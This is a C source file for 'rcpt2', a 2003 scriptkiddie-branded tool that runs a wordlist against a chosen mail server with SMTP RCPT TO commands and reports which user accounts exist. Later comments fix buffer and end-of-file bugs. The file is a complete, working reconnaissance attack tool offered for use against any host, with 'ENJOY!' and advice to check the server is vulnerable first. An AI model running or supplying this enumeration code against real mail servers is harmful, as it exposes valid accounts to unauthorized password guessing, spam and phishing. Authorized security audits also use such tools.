/*	
rcpt2		SMTP (RCPT TO) User enumeration.
Date:           29.11.2003
Author:         B-r00t. <br00t@blueyonder.co.uk>
Webpage:	Http://doris.scriptkiddie.net
IRC:		doris.scriptkiddie.net:6969 - SSL
                                                                     
Compile:        gcc -o rcpt2 rcpt2.c
                                                                                           
Description:	Uses a dictionary to enumerate user accounts via
		SMTP (RCPT TO). Ensure that the SMTP server is
		vulnerable manually before using this tool.


rcpt2 by B-r00t. (c) 2003.
 
Usage: rcpt2 <USERLIST> <HOST>
       rcpt2 usernames.txt smtp.acme.com

ENJOY!
*/

//Includes
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

//Defines
#define	PORT		25
#define	BUFFSIZE	2048
#define	NAME		"rcpt2"
#define HELO		"HELO doris.scriptkiddie.net\n"
#define MAIL		"mail from:<hax0r@doris.scriptkiddie.net>\n"
#define RCPT2		"rcpt to: "

/* Color definitions */
#define YELLOW          "\E[33m\E[1m"
#define RED             "\E[31m\E[1m"
#define BLUE            "\E[34m\E[1m"
#define NORMAL          "\E[m"

//Prototypes
int usage(char *progname);
int get_connect (int port, char *host);
int send_sock (int sock, char *buff);
int read_sock (int sock, char *buff);

//Mighty Main
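int main (int argc, char *argv[])
{
// argv[1] = usernames (one per line)
// argv[2] = hostname
	int	sock;
	FILE	*ifp;
	char	sockbuff[BUFFSIZE], username[255], rcpt[300];
	memset(sockbuff, '\0', sizeof(sockbuff));

	printf("\n%s%s by B-r00t. (c) 2003.%s", BLUE, NAME, NORMAL);

	if (argc < 3) usage(argv[0]);	/* usage() exits, it never returns */

	if ( (ifp = fopen(argv[1], "r")) == NULL)
	{
		printf("\nFile %s ", argv[1]);
		fflush(stdout);
		perror("[fopen] ");
		exit(2);
	}

	printf("%s\nUsernames from: %s", RED, argv[1]);
	printf("\nRCPT TO username enumeration on %s.\n\n", argv[2]);
	printf("%s", NORMAL);

	//Connect
	sock = get_connect(PORT, argv[2]);
	if (sock == -1) {
		printf("Error: Connection Failed!");
		fclose(ifp);
		exit(-1);
	}

	//SMTP Banner
	read_sock (sock, sockbuff);
	printf("%s\nBANNER: %s", YELLOW, sockbuff);

	//Send HELO
	printf("\nSEND: %s%s", YELLOW, HELO);
	send_sock (sock, HELO);

	//Read the result
	read_sock (sock, sockbuff);
	printf("%sRECV: %s", YELLOW, sockbuff);

	memset(sockbuff, '\0', sizeof(sockbuff));

	//Send MAIL FROM
	printf("%s\nSENT: %s", YELLOW, MAIL);
	send_sock (sock, MAIL);

	//Read the result
	read_sock (sock, sockbuff);
	printf("RECV: %s", sockbuff);
	printf("%s\n\n", NORMAL);

	/* fgets() returns NULL at EOF or on a read error.  Testing feof()
	 * before the read (as the original did) left the previous username
	 * in the buffer and sent it a second time after the file ended. */
	while (fgets(username, sizeof(username), ifp) != NULL)
	{
		/* Drop the line terminator (if any), skip blank lines and append
		 * exactly one "\n" when building the command: a final line with
		 * no newline would otherwise be sent unterminated and read_sock()
		 * would block waiting for a reply that never comes.  Lines longer
		 * than 254 bytes are still split across iterations, as before. */
		username[strcspn(username, "\r\n")] = '\0';
		if (username[0] == '\0') continue;

		//Build RCPT TO (rcpt is large enough for RCPT2 + a full username line)
		snprintf(rcpt, sizeof(rcpt), "%s%s\n", RCPT2, username);

		//Send RCPT TO
		send_sock (sock, rcpt);

		/* Clear the buffer before every read: recv() does not terminate
		 * the data, so a reply shorter than the previous one would be
		 * followed by the tail of that earlier reply and the "250" test
		 * below could match stale text. */
		memset(sockbuff, '\0', sizeof(sockbuff));

		//Read the result; 0 bytes means the server closed the session
		if (read_sock (sock, sockbuff) == 0) {
			printf("\nError: %s closed the connection\n", argv[2]);
			break;
		}

		//Were we successful? Any reply containing "250" is reported as a known recipient.
		if ( strstr(sockbuff, "250")) printf("VALID_USER: %s\n", username);
	}

	if (ferror(ifp)) {
		printf("\nError [ferror] %s", argv[1]);
		fclose(ifp);
		close(sock);
		exit(4);
	}

	//RSET mailserver & QUIT
	printf("\n\nSending RSET & QUIT to %s\n", argv[2]);
	send_sock (sock, "RSET\n");
	send_sock (sock, "QUIT\n");
	sleep(1);
	close(sock);
	fclose(ifp);
	printf("\nOk Done!\n\n\n");
	return 0;
}//End_Main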

	
//Do Socket Connect
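int get_connect (int port, char *host)
{
	/* Resolve `host`, open a TCP socket and connect it to `port`.
	 * Returns the connected descriptor, or -1 if socket() fails.
	 * Resolution and connect() failures print a message and exit(-1),
	 * as in the original. */
	int sock;
	struct sockaddr_in dest_addr;
	struct hostent *target;

	if ((target = gethostbyname(host)) == NULL) {
		herror("gethostbyname");
		exit(-1);
	}

	/* gethostbyname() may hand back a non-IPv4 record or an empty address
	 * list; the original copied h_addr without looking at either. */
	if (target->h_addrtype != AF_INET
	    || target->h_addr_list[0] == NULL
	    || target->h_length != (int)sizeof(dest_addr.sin_addr)) {
		fprintf(stderr, "\ngethostbyname: no IPv4 address for %s\n", host);
		exit(-1);
	}

	/* 6 in the original is IPPROTO_TCP; use the named constant */
	if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
		perror("\nsocket");
		return -1;
	}

	/* Zero the whole struct instead of only sin_zero */
	memset(&dest_addr, 0, sizeof(dest_addr));
	dest_addr.sin_family = AF_INET;
	dest_addr.sin_port = htons(port);
	memcpy(&dest_addr.sin_addr, target->h_addr_list[0], sizeof(dest_addr.sin_addr));

	if (connect(sock, (struct sockaddr *)&dest_addr, sizeof(dest_addr)) == -1) {
		perror("\nconnect");
		close(sock);
		exit(-1);
	}
	return sock;
}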

//Send Data To Socket
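int send_sock (int sock, char *buff)
{
	/* Write the whole NUL-terminated string `buff` to `sock`, looping
	 * over partial sends.  Returns the number of bytes written (0 for an
	 * empty string).  A send() error prints a message, closes the socket
	 * and exits(-1).  Note: send() on a socket whose peer has gone away
	 * raises SIGPIPE by default; that case is not handled here. */
	size_t remaining = strlen(buff);
	int total = 0;

	while (remaining > 0) {
		/* send only what is left, not strlen(buff) again */
		ssize_t bytes = send(sock, buff, remaining, 0);
		if (bytes == -1) {
			perror("send");
			close(sock);
			exit(-1);
		}
		remaining -= (size_t)bytes;
		buff += bytes;
		total += (int)bytes;
	}
	return total;
}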


//Read Data From Socket
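int read_sock (int sock, char *buff)
{
	/* Read one chunk from `sock` into `buff` and NUL-terminate it.
	 * `buff` must point at BUFFSIZE bytes (every caller passes
	 * sockbuff[BUFFSIZE]).  Returns the byte count; 0 means the peer
	 * closed the connection and leaves buff as "".  A recv() error
	 * prints a message, closes the socket and exits(-1).
	 *
	 * The original did memset(buff, '\0', sizeof(buff)), which on a
	 * pointer clears only sizeof(char *) bytes, so a reply shorter than
	 * the previous one was followed by stale data from the earlier reply. */
	memset(buff, '\0', BUFFSIZE);
	ssize_t bytes = recv(sock, buff, BUFFSIZE - 1, 0);
	if (bytes == -1) {
		perror ("\nrecv");
		close(sock);
		exit(-1);
	}
	buff[bytes] = '\0';	/* recv() does not terminate the data */
	return (int)bytes;
}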

//Usage    
int usage(char *progname)
{
	/* Print the command-line synopsis (in red) and terminate with -1.
	 * Declared as returning int but never returns. */
	fprintf(stdout, "%s\n\nUsage:\t%s <USERLIST> <HOST>", RED, progname);
	fprintf(stdout, "\n\t%s usernames.txt smtp.acme.com", progname);
	fprintf(stdout, "%s\n\n", NORMAL);
	exit(-1);
}
// D-O-R-I-S
// Doris Only Really Interests Scriptkiddies...
// ENJOY!


